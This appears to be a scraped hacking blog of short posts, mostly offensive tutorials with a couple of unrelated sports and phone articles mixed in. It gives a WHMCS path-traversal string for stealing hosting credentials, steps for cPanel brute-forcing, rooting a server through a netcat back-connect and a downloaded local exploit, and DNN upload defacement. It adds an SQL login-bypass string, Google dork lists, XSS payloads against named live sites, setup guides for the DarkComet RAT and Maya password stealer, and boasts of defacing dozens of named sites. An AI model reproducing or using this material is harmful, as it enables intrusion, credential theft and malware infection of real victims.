SAFE MODE BYPASS

Hey friends in this i will tekll you how to bypass the safe  mode :D

here the safe mode script
click here  <<---- to get the script  --->


How to Bypass the Safe Mode .... xd ;)






Enjoy ;)
Don't forget to share it :D
 

Cpanel Cracking video tut


Hey friends earlier i have written tutorial on how to crack Cpanel :-

You can check the above link for the cpanel script :)

here is the video link :-
 http://youtu.be/_C9z4S9Xlx8





Have Fun Guys .. ;)
 i hope this is helpful to u.. ;)
 

WHM CRACKING LFI VIDEO TUT



Hey Friends I have written how to crack whm panel (written tutorial ) :-
http://tech4lab.blogspot.in/2012/05/how-to-crak-whm-panel.html

Now I have made a video TUTORIAL :- How to crack WHM - LFI Exploit


cart.php?a=projectx&templatefile=../../../configuration.php
Video Link :-
http://youtu.be/0skWQnolqZ8





Have FUN

i hope this post is helpful to u.. ;)

 

Havij v 1.152 pro with crack

Hey friends after havij v 1.15. New version of havij v 1.152 has been released with many new features i hope you like.....

New features of Havij v 1.52
-Webknight WAF bypass added.
-Bypassing mod_security made better
-Unicode support added
-A new method for tables/columns extraction in mssql
-Continuing previous tables/columns extraction made available
-Custom replacement added to the settings
-Default injection value added to the settings (when using %Inject_Here%)
-Table and column prefix added for blind injections
-Custom table and column list added.
-Custom time out added.
-A new md5 cracker site added
-bugfix: a bug releating to SELECT command
-bugfix: finding string column
-bugfix: getting multi column data in mssql
-bugfix: finding mysql column count
-bugfix: wrong syntax in injection string type in MsAccess
-bugfix: false positive results was removed
-bugfix: data extraction in url-encoded pages
-bugfix: loading saved projects
-bugfix: some errors in data extraction in mssql fixed.
-bugfix: a bug in MsAccess when guessing tables and columns
-bugfix: a bug when using proxy
-bugfix: enabling remote desktop bug in windows server 2008 (thanks to pegasus315)
-bugfix: false positive in finding columns count
-bugfix: when mssql error based method failed
-bugfix: a bug in saving data
-bugfix: Oracle and PostgreSQL detection

You can use the havij free version  ... but pro version is not free.. so you have to registered it..
For register
username- Cracked.By.Exidous_For_Opensc.ws
put the lisence key from the folder - HavijKey.lic

download link
click here 

i hope this post is helpful to u....... :D

 

Cpanel Cracking

Hey friends I m going to tell you how to crack CPanel of the site.
Things you need ..
  1. Shelled site
  2. Cpanel Scrip
  3. Briain XD
First you need a shelled site like in my case
www.site.com/yourshell.php
you can see  the image
Now upload the Cpanel Script
 www.site.com/nyrocpanel.php
see below

 Once you have uploaded the cpanel script in the site now grab the Username  and password
 see below



 Put the username in the user list and put the password in the password list then click on ok
You see it starts cracking the username and password


Once you get the username and password you can stop this process

After getting the username and password go the cpanel of the site
www.site.com:2082
and type the username and password there

DOWNLOAD
cpanel script :-
click here
media fire pass :- tech4lab
file pass :- nyrocpanel



i hopr this post is helpful to u..
 

Malaysia server hacked and deface by Nyro Hacker n Silent Hacker

Malaysia hosting owned by Nyro Hacker and Silent Hacker from Indian Cyber leets.
They defaced 50+ sites
#sites#
    http://asyrafmarketer.com/

    http://auly.co.cc/

    http://azreen.com/

    http://c-onweb.com/

    http://dynamicconceptjb.com/

    http://ekursus-affiliate.com/

    http://emelmatik.com/

    http://galerikahwin.com/

    http://gedungsihat.com/

    http://gempakcyber.com/

    http://geriknet.co.cc/

    http://iklanextra.co.cc/

    http://www.impianrealiti.com/

    http://jayen.com.my/

    http://josephbiz.com/

    http://jponlinestore.com/

    http://www.kedaiemas2u.com/

    http://kelasblogger.com/

    http://kepoweraninternet.com/

    http://kerunai.com/

    http://latestnewsengine.info/

    http://www.1suara.com.my//cgi-sys/suspendedpage.cgi

    http://vemmazing.co.cc//cgi-sys/suspendedpage.cgi

    http://www.wimexbeauty.co.cc/wb/

    http://weegoo.co.cc/

    http://xlimberry.com/cgi-sys/suspendedpage.cgi

    http://mangosteen2u.com/

    http://www.matjiwang.com/

    http://monavieteamwork.com/

    http://www.mudahjual.com/

    http://myphyto.com/

    http://myslimberry.co.cc/

    http://www.nazimlaguna.com/

    http://wanzulhamli.com/

    http://pakartuisyenonline.com/

    http://botolsusu.pakartuisyenonline.com/

    http://kangarookeeper.pakartuisyenonline.com/

    http://www.kedaionline.pakartuisyenonline.com/

    http://pier-four.com/

    http://rahsiacharkueyteow.com/

    http://kerjasambilandarirumah.com/

    http://rahsiamaklumat.co.cc/

    http://rezekimasyuk.com/

    http://digital-niaga.co.cc/

    http://kursus-affiliate.co.cc/

    http://rahsiapakarsoftware.co.cc/

    http://rahsiacharkueyteow.com/

    http://sanetwork.com.my/

    http://satuminda.co.cc/

    http://spheraresources.com.my/

    http://superslideup.com/

    http://v1ezlife.com/

    http://www.vemmachinese.com/

#Mirrors#

    http://arab-zone.net/mirror/88124/emelmatik.com/

    http://arab-zone.net/mirror/88123/ekursus-affiliate.com/

    http://arab-zone.net/mirror/88122/dynamicconceptjb.com/

    http://arab-zone.net/mirror/88121/azreen.com/

    http://arab-zone.net/mirror/88119/asyrafmarketer.com/

    http://arab-zone.net/mirror/88270/josephbiz.com/

    http://arab-zone.net/mirror/88269/jayen.com.my/

    http://arab-zone.net/mirror/88268/impianrealiti.com/

    http://arab-zone.net/mirror/88267/iklanextra.co.cc/

    http://arab-zone.net/mirror/88266/geriknet.co.cc/

    http://arab-zone.net/mirror/88265/gempakcyber.com/

    http://arab-zone.net/mirror/88263/galerikahwin.com/

    http://arab-zone.net/mirror/88264/gedungsihat.com/

    http://arab-zone.net/mirror/88335/vemmachinese.com/

    http://arab-zone.net/mirror/88334/v1ezlife.com/

    http://arab-zone.net/mirror/88333/superslideup.com/

    http://arab-zone.net/mirror/88332/sanetwork.com.my/

    http://arab-zone.net/mirror/88331/rahsiacharkueyteow.com/

    http://arab-zone.net/mirror/88330/kursus-affiliate.co.cc/

    http://arab-zone.net/mirror/88329/rezekimasyuk.com/

    http://arab-zone.net/mirror/88328/kerjasambilandarirumah.com/

    http://arab-zone.net/mirror/88327/rahsiacharkueyteow.com/

    http://arab-zone.net/mirror/88326/pier-four.com/

    http://arab-zone.net/mirror/88325/kedaionline.pakartuisyenonline.com/

    http://arab-zone.net/mirror/88324/kangarookeeper.pakartuisyenonline.com/

    http://arab-zone.net/mirror/88321/nazimlaguna.com/

    http://arab-zone.net/mirror/88320/myslimberry.co.cc/

    http://arab-zone.net/mirror/88319/myphyto.com/

    http://arab-zone.net/mirror/88318/mudahjual.com/

    http://arab-zone.net/mirror/88317/monavieteamwork.com/

    http://arab-zone.net/mirror/88315/mangosteen2u.com/

    http://arab-zone.net/mirror/88314/latestnewsengine.info/

    http://arab-zone.net/mirror/88313/kerunai.com/

    http://arab-zone.net/mirror/88312/kepoweraninternet.com/

    http://arab-zone.net/mirror/88311/kelasblogger.com/

    http://arab-zone.net/mirror/88310/kedaiemas2u.com/

    http://arab-zone.net/mirror/88309/josephbiz.com/

    http://arab-zone.net/mirror/88308/vemmachinese.com/

    http://arab-zone.net/mirror/88307/v1ezlife.com/

    http://arab-zone.net/mirror/88306/superslideup.com/

    http://arab-zone.net/mirror/88305/sanetwork.com.my/

    http://www.arab-zone.net/mirror/88304/rahsiacharkueyteow.com/

    http://www.arab-zone.net/mirror/88303/kursus-affiliate.co.cc/

    http://arab-zone.net/mirror/88302/rezekimasyuk.com/

    http://arab-zone.net/mirror/88301/kerjasambilandarirumah.com/

    http://www.arab-zone.net/mirror/88299/pier-four.com/

    http://www.arab-zone.net/mirror/88300/rahsiacharkueyteow.com/

    http://arab-zone.net/mirror/88298/kedaionline.pakartuisyenonline.com/

    http://www.arab-zone.net/mirror/88296/botolsusu.pakartuisyenonline.com/

    http://arab-zone.net/mirror/88295/pakartuisyenonline.com/

    http://www.arab-zone.net/mirror/88294/wanzulhamli.com/

    http://www.arab-zone.net/mirror/88293/nazimlaguna.com/

    http://arab-zone.net/mirror/88292/myslimberry.co.cc/

    http://www.arab-zone.net/mirror/88291/myphyto.com/

    http://www.arab-zone.net/mirror/88289/matjiwang.com/

    http://arab-zone.net/mirror/88287/latestnewsengine.info/

    http://www.arab-zone.net/mirror/88285/kepoweraninternet.com/

    http://www.arab-zone.net/mirror/88286/kerunai.com/

   http://arab-zone.net/mirror/88283/kedaiemas2u.com/
 Greetz to:- Shorty 420, jaguar Hacker, hacker_m329,  outsider, secbreaker and all member of indian cyber leets..

 

How to crak WHM Panel

Hey Friends I m going to tell you how to Crack Whm Panel  LFI  Exploit :-
Things you need :-

Shell in a server :- 


Hosting ( Powered by WHMCS )

LFI Exploit :-
cart.php?a=projectx&templatefile=../../../configuration.php

Now how to crack it ? If you have all the above things :-
Find cart.php in the site like www.host.com/cart.php
IF you get the cart.php now put your LFI Exploit :- AS SHOWN BELOW
www.host.com/cart.php?a=projectx&templatefile=../../../configuration.php

After putting your LFI Exploit  Perss ctrl + U or rightclick - View Page Source.
There you get the Username n Password of the hosting :- IMAGE BELOW

After getting the Username n Password . Click the SQL Option From your shell. Type the Username n Password there then select the database :-

Now select the Table admin's  you get the password of WHMCS. Decrypt the password. Login to the WHM Panel Enjoy.. ;)


i hope this post is helpful to u.. ;)
 

HACKED by nyro hacker and silent hacker

Nyro hacker and Silent hacker from Indian Cyber leets hacked some sites of argentina.
sites
http://campusvirtual-ise.com.ar/ICL.html
http://tugestoriavirtual.com.ar/ICL.html
http://estudiargestoria.tugestoriavirtual.com.ar/ICL.html
http://circulodegestores.com.ar/ICL.html
http://createtusweb.com.ar/ICL.html
http://cursoonlineisi.com.ar/ICL.html
http://cursosonlineise.com.ar/ICL.html
http://designersweb.com.ar/ICL.html
http://estudiandogestoria.com.ar/ICL.html
http://gestoriadominguez.com.ar/ICL.html
http://gestoriasantacruz.com.ar/ICL.html
http://marketingdeexito.com.ar/ICL.html
http://marketingexitoso.com.ar/ICL.html
http://portaldegestores.com.ar/ICL.html
http://salinasmarisa.com.ar/ICL.html
http://tugestoriaonline.com.ar/ICL.html
Mirror
http://arab-zone.net/mirror/87783/tugestoriaonline.com.ar/icl.html
http://arab-zone.net/mirror/87782/salinasmarisa.com.ar/icl.html
http://arab-zone.net/mirror/87781/portaldegestores.com.ar/icl.html
http://arab-zone.net/mirror/87779/marketingdeexito.com.ar/icl.html
http://arab-zone.net/mirror/87780/marketingexitoso.com.ar/icl.html
http://arab-zone.net/mirror/87778/gestoriasantacruz.com.ar/icl.html
http://arab-zone.net/mirror/87776/estudiandogestoria.com.ar/icl.html
http://arab-zone.net/mirror/87777/gestoriadominguez.com.ar/icl.html
http://arab-zone.net/mirror/87775/designersweb.com.ar/icl.html
http://arab-zone.net/mirror/87773/cursoonlineisi.com.ar/icl.html
http://arab-zone.net/mirror/87774/cursosonlineise.com.ar/icl.html
http://arab-zone.net/mirror/87772/createtusweb.com.ar/icl.html
http://arab-zone.net/mirror/87771/circulodegestores.com.ar/icl.html
http://arab-zone.net/mirror/87769/tugestoriavirtual.com.ar/icl.html
http://arab-zone.net/mirror/87768/campusvirtual-ise.com.ar/icl.html

 

Xss in Indo Global

XSS found by Nyro Hacker in Indo Global PVT offcial site.
site :- http://indusglobal.com.au
xss:- http://indusglobal.com.au/cms/add_product.php?msg="><script>alert(String.fromCharCode(88, 83, 83, 32, 66, 89, 32, 78, 89, 82, 79, 32, 72, 65, 67, 75, 69, 82))</script>

 

Xss in kevinmurphy by Nyro hacker

Kevin Murphy is a fashion focused range of salon only, professional, hair care products that was conceived in the world of session styling. Nyro Hacker found xss (cross sode scripting) in his official Site.
site:- http://www.kevinmurphy.com.au
XSS- http://www.kevinmurphy.com.au/win/win.superstar.details.php?id=%27%3E%3Cscript%3Ealert%28%22XSS%20BY%20NYRO%20HACKER%22%29%3C/script%3E
 

XSS in Stanford - By nyro hacker

XSS found by NYRO Hacker in Stan Ford University home official site.
 

Root - Rooting a webserver





Root A webserver 
 Rooting :- Getting access to the remote system is called rooting.
If you get access to the remote system you can do anything ( delete or copy anything from the server or into the server)  and you can deface all sites which is available in the server.

Get a root access

Need a shelled site
Local root exploit for the site ( check on exploits )
Net cat
Netcat ( download link )
click here

Let's Start
First upload a shell in a site open your shell you see at the top kernel version of the site.
Now open netcat
        Type :-  -lnvp 433    (hit enter)
Now go back to the shell open the back connect option change the port 433 (hit enter)

 Find the local root version ( google it)
Now type wget link of the local root.c in the netcat (hit enter)
Chmod 777 localroot.c (hit enter)
It will be transformed into local root then type chmod 777 local
Now execute exploit type ./local root (hit enter) 
It will start rooting the server and the server is rooted

Video tutorial coming soon .. :D
Only for education purpose
i hope this is help ful to you... dont forget to share it...
 

 

Key Player - Cristaino Ronaldo


 Real Madrid  Out to clinch La Liga crown in Bilbao
                                            
                                           
                                            Cristaino Ronaldo will be Real Madrid's key man

 Real Madrid visit Athletic Bilbao on Wednesday knowing a win would give them their first 'La Liga' title in four years, breaking the domination of Barcelona forged by the departing Pep Guardiola.

With three games remaining Madrid's seven point lead over the Catalans mean one more win is all they require, and the trophy would go some way to make up for the disappointment of losing last week's Champions League semi-final to Bayern Munich.

For Madrid coach Jose Mourinho it would be the fourth country in which he has achieved such a feat, he is currently level on three with Louis van Gaal who includes two titles in Spain with Barca in his personal haul.

It would also be an incredible seventh championship in 10 seasons for the Portuguese coach who started with two titles in his native country with Porto before going on to win two at both Chelsea and Inter Milan.

To add to the growing list of achievements Madrid need to win their three remaining games to reach 100 points and break the record set by Guardiola's Barca in 2009/10 when they got 99 points to beat Madrid by three, then led by Manuel Pelligrini.

Mourinho continued his boycott of the Spanish media after Sunday's 3-0 victory over Sevilla but his assistant Aitor Karanka talked of the potential of winning the league at his former club.

"It would be nice to become champions in San Mames (Bilbao's stadium), to win the Spanish league is important because it has taken a huge effort to achieve it and it was a big objective of ours, but it does not make up for missing out in the Champions League," he said.

For their part, Barcelona kick-off against fourth-placed Malaga two hours before and a defeat for Guardiola's side would hand the title to Madrid before a ball is kicked.

The same scenario, however, was the case last Sunday before Barcelona showed no signs of nerves and recorded a 7-0 away victory at Rayo Vallecano.

Lionel Messi grabbed two goals to go level with Cristiano Ronaldo on 43 league goals meaning the world's best two players will take their own particular contest to finish as La Liga's top-scorer to the very end.

Messi also has another prize in sight as he currently has 65 in all competitions, just two short of Gerd Muller's 67 goal record set in the 1972/73 season for Bayern Munich.

Other issues to be resolved include the two remaining Champions League and Europa League places.

Valencia and Malaga are in the driving seat for the bigger prize, on 55 points they are both three ahead of Levante.

Any slip-up for Malaga at Barca or Valencia at home to Osasuna, themselves only a point from a Europa League place, could be capitalised on by Levante who go to relegation threatened Zaragoza on Wednesday.

The side from Aragon are facing the drop along with Sporting Gijon, both teams are on 34 points, four from Villarreal and five from Granada with bottom club Racing Santander already relegated.

Villarreal are the visitors to Sporting Gijon on Tuesday for a decisive clash no team can afford to lose.

Sporting's Croatian centre-forward Mate Bilic, a key player in their revival of recent weeks, is under no illusions as to the importance of the game.

"It's been a difficult year but all that matters now is survival.

"It's complicated but if we beat Villarreal we'll have a chance. They have World Cup winners in their team so it will be difficult, but our fans will play a big part and we owe it to them to get the win," he said.

you can read this on Times OF India 
 

Dnn- Website Hacking


DNN (Dot Net Nuke), It is the method of hacking website. it is simple and i think you can do it.
First you need a dnn Vulnerable site. Lets find that
You can find dnn vulnerable site by using dnn dorks
Just copy the following dorks and paste it into the google you will get dnn vulnerable site
Dorks to find the Dnn vul site
:inurl:/tabid/36/language/en-US/Default.aspx 

Here are some  commands  which you have to insert  into the dnn vul site
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
javascript:__doPostBack('ctlURL$cmdUpload','')


First command you have to insert after the site URL
such as http://www.dnnvul.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
When you entered the first command you see a link gallery open
Now select the file option you can see in the pic below
  After selecting the file option  paste the java script into the address bar "javascript:__doPostBack('ctlURL$cmdUpload','') "
Now you see the option browser ( from this option you can enter your deface or shell in the site ).


After uploading you can see your deface in the site.... Yeah it's soo simple.. :D

Video tutorial coming soon....
i hope you all like it..... :D


 

Brutus - Password Cracker

Brutus is a remote password cracker tool and it is a free tool. It is available for Win 7 , XP, Vista, 9x, NT, 2000.
It stored default password's and usernames . You can use this tool to crack the Username and password of any site.
Currently released  Brutus version AET2
 It includes the following authentication types :-
 HTTP ( Basic Authentication )
 HTTP ( HTML form/CGL )
 POP3
 FTP
 SMB
 Telnet
and other many more...


Features of Brutus AETv2
 Multi-stage authentication engine
60 simultaneous target connections
No username, single username and multiple username modes
Password list, combo (user/password) list and configurable brute force modes
Highly customisable authentication sequences
Load and resume position
Import and Export custom authentication types as BAD files seamlessly
SOCKS proxy support for all authentication types
User and password list generation and manipulation functionality
HTML Form interpretation for HTML Form/CGI authentication types
Error handling and recovery capability inc. resume after crash/failure.
Brutus Free download :-  
Click here

i hope this tool is helpful to you.... :D
 

Fun with Mark Zuckerberg on Facebook - The Wall Machine

Hey today i am  going to tell you how to create Fake Facebook Wall Status Messages.
Fool your friends by creating the fake Facebook Status message which is unbelievable, unacceptable, and share that with your friends.

Now how to do that?
Now you have to go to the  
The Wall Machine 

The wall machine is a Facebook app which creates a fake Facebook Status. You can create some different statues like got comments from celebrities such as Mark Zuckerberg ( Facebook owner ), Charles Darwin...etc

Now click on f connect
    When you clicked on the f connect now you have to login in your Facebook account
Once you login to your account Now you can create your own Status here and share it with your friends
By clicking  on text you can change the text.
 By clicking on Friendship you can create friendship with celebrity ( have a proof )
By clicking on Photo you can set  the photo of your choice
By clicking on relationship you can put your relationship status with celebrity
By clicking on like you can set the like of celebrity on your status
By clicking on Event you can make a event of celebrity

 After doing all the steps above and click on save your wall look like 

 Have a great fun with celebrity 
and I hope you all like this post.... :D
 

 

Dark Comet - Popular Rat Used for Computer Hacking

Hey friends Today I am going to tell you about one of the most important Rat. I am not going to discuss here what is rat ? I have posted that earlier.  Dark Comet is the most popular rat . It is also easy use.
As it helps to control the people computers and Steals their important information.

 

How to setup Dark Comet v5.1
  • Step -1
          Open dark comet rat -> Click on -> Client Server -> No ip updater
  • Step 2
             Click on update DNS  You see a message  update successfully .

  • Step 3
        Click on Dark Comet Rat -> Server Module -> Minimalist (quick [expert version coming soon])
 You fill the blanks with your details 

  • Step 4
    It has a great feature of drag and drop you just drag your Icon there and click on small or normal
Now you see the your rat come on your PC.
Note:-
Disable your antivirus while setting up rat or downloading this software . Antivirus will detect and does not allow to work or delete it also. Don't execute that it will not harm your PC. Just give it to the victim.
Download  Dark Comet V5.1
Click here
Only for education purpose .... Try at your own risk
i hpoe you like this post don't forget to share it..... :D
 

Keylogger- hacking E mail accounts and passwords

Key logger are the software that monitors  keystrokes activities performed by the victim. It records every keyword that was typed by the user including E- mails, Password, Usernames, Bank accounts information.. etc. It sends log to the attacker E mail id. This can give your secret information to the attacker email. By this attacker has access to your accounts and email Ids.

Facebook Hacking
By key logger you can hack also Facebook accounts of the people. You send key logger through Some files
by attaching your key logger to that files. Once victim downloaded your files and execute his downloaded files
Key logger also get activated with that files and start working. It start's recording every keystroke which was typed by the victim and you get log of the every keystroke  to your E mail account. You get the username and password of the victim Facebook account. It is so easy.  

Protection
Anti-virus companies  added information about known key logger in their anti virus database. For new key logger one should update his antivirus everyday. Keep updating your antivirus every day. This may help you detect key logger and provide protection against key logger.

Install the firewall and this also help you to detect key logger and also prevent it.

Use virtual keyboard while entering Usernames & passwords or any important information about accounts (banks). As this technique prevent the key logger by sending  the important information to the attacker.
Steps to open virtual Keyboard  
Start > Programs > Accessories > Accessibility > On-Screen Keyboard
Some mostly used keylogger
 Refog
Revealer Keylogger
Super Free Keylogger
Actual Keylogger
Only  for education purpose... Try at your own risk
i hope this post is helpful to you..... :D

 

  
 

Hack Email & Facebook Account - Maya


 

Hack Facebook account and E-mail id - Maya
Maya ( password Stealer ) by Prince Ali. It is used by the hackers to steal the password's from  victim system.
It is mostly used to hack the E-mail accounts you can use it for hack the Facebook accounts. It is easy to understand and use. You can make your own "trojan" ( virus ) just in three simple steps.
It create log in three methods
  • Mail Delivery
  • PHP Delivery
  • Save Locally
How to setup Maya 
  • Mail Delivery
If you are setting your maya with " Mail Delivery". You are able to send your maya log through the Email accounts. In Recipient Email put your email id and in From Email you put the victim Email id ( which you want to hack ). Then put your File Name ( maya.exe ) and select the option below i.e (Ras Passwords , Grab IE Urls and ActiveX Startup).
Note- Maya will check for 2 hours if it get the new password then it will send thos to your Email.
  • PHP Delivery
First you upload your PHP script into your site like " ww,yoursite.com ". Put your uploaded php url to the PHP Script Url.
*Before uploading
Remember Changing the php Script password and Entry number , Open the File with
Notepad.
The First 3 Entries are :
$view_pass = “password”; //This is the Password you will use to view the Logs
$length = 1000; //The number of Entries to keep
$ctrl_file = “mpws.txt”; // the Text file name the passes will be saved in it 
Remember to CHMOD the Files , on Some Host the ctrl_file cannot be automatically create so it is recommended to create a blank file and upload it urself .

You can see the password here
http://www.yoursite.com/logger.php?pass=mypassword
You can set password to your logs so that no other person can see that
http://www.yoursite.com/logger.php?action=clear&pass=mypassword
  • Save Locally
By selecting the save locally option  and your  password will save on C:/maya.html
Some important terms
RAS passwords :- If you want to clear the Internet connection passes.
Grab IE urls :- To grab the IE urls.
ActiveX start UP :- It will start as the windows starts.

Download Maya
click here
password :- NWC

 
Only  for education purpose... Try at your own risk
 i hope this post is helpful to you...... :d
 


 

Manual SQL Injection


Hey friends i have told you  about sql in my previous and  i m not going to discuss that here.

I have made a video tut on How to Hack SQL vul sites manually.

Watch video tut

Only for education purpose... Try it at your own Risk
i hope this video is helpful 2 u.... :D

 

Iphone 5 Features and Release Date

Apple is the most successful company in the world especially in I Phones. All it's products has been launched in the market. It shows a great success in the world of technology. Now we all especially "Apple Fans" are waiting for the new version of  i phone i.e I Phone-5.
What we expect from  apple I Phone 5 ?
The new device (iphone5) everything from a 3d screen, to the Liquidmetal casing.
Possible link for I phone 5 released date.
Rumors called the apple smartphone 5 " revolutionary" .
The original Japanese media’s report noticed that there were many Foxconn hiring notices throughout Taiyuan. The Foxconn factory that will apparently assemble the iPhone 5 is located there. The Maeil Business Newspaper reporter phoned the Foxconn factory in Taiyuan, and spoke to the H&R head. “Yes, it’s true we are hiring a large number of workers,” the human resources head told the paper.

When people asked for the released date of i phone 5 then the Rumors  said that the company has just received the order and  the release date of i phone 5 is around "october" .

We can expect the features of i phone 5
Features
It will release with new IOS 6.
30 pin  dock connector
Battery size of a power 4G LTE radio
More Ram
Better camera
Bigger Screen
NFC
Upgraded "A5X"
i hope you all like this post and wait for i phone 5 to come ... :D






 
 

What is SQL Injection? and how to find SQL vul Site and DOrks

SQL ( structure Query Language) is a technique to attack  database of the website which can contains usernames, Passwords, Credit card Info and other confidential data.It mainly occur in the web application. It occurs when there is a bug in the my SQL syntax. By this attacker enter into the database and cause damage to the site. The main reason for sql injection because the admins don't pay that much attention to the security of the site.
You can hack Site by the followings methods ( mostly used )
Manual SQL Injection
SQl Injection with tool
By pass queries of the Sql Injection. This allows attacker to get into the site with knowing the password & username
Username = admin
Password = ' or '1'='1

How to protect your site from SQL attacks
  • Scan your site with best vulnerability scanner every month or every 2 week 
  • If you find any SQL vulnerability patch it as soon as possible.
  • Always put your strong , encrypted , can't be guess by dictionary attack
  • Always enable WAF( web authentication filter) this will prevent attacker to execute malicious scripts and thus also prevent xss (cross side scripting) .
  • Always track your logins, If any attacker hacked your site you get to know that.   
How to find SQL vul Sites
Here are some dorks by which you can find the  SQL vul sites just by copy and pasting the dorks in the google and you see the many sites. By putting the " ' " ( with out quotes ) at the end of the SQL parameter you can the sites weather they are vul to SQL or not . If it is SQL vul you see the error ( MY SQL Syntax)  or if there is no error then website will open as is it after having " ' " ( wiith out quotes )at the end or you see no MY SQL Syntax error and the website is not SQL Vul.

IT LOOK 'S LIKE
Search dork on google

MY SQL  Syntax error on the site
The above site is SQL vul you can hack it by using the tool havij or by  doing it manually.

SQL Dorks
Mostly Used dorks
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
Rest dorks
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=

If you want to search the SQL vul site of a particular country you can search SQL vul site of a 
particular country ..
Just put the .site:countrycode
for example
i took a dork " inurl:index.php?id= " Now if you to search the SQL vul site of a particular country ( pakistan country code (.pk)
your dork is " inurl:index.php?id=site:pk "
Download more dorks
click here 
Only for education purpose... Try it at your own Risk 
 i hope this post is helpful to you..... :D Happy security... :)
 

Computer Rats - Used for Hacking computers




Rats ( Remote Access Tool) is type of computer virus that allows to control your system remote and  the operator control your system fully. Rats installed in a system with out victim  knowledge and it disable your all security of your system ( antivirus, firewall settings...etc).

An operator share your personal data and steal your personal information  like credit cards details, email id, passwords... etc.
It is basically used to hack the bank accounts of the victim's. An operator can send Rats to the victim and steals his all bank account information including usernames and passwords.

It is send through media files, software available in the internet when a victim download any software containing rat he is unaware of rats. When he execute that software the rats also get's activated along with the software and start it effect by disabling various security software available in the system (antivirus , firewall settings ...etc), Through Email ID, also by clicking in unwanted hyperliks.

 Important rat used by hackers
Dark Comet

To protect your system  from rats install  Dark Comet Remover
Only for education purpose... Try it at your own Risk
i hope this post is helpful to you >> :D
 
 
Share

[Get Float Buttons]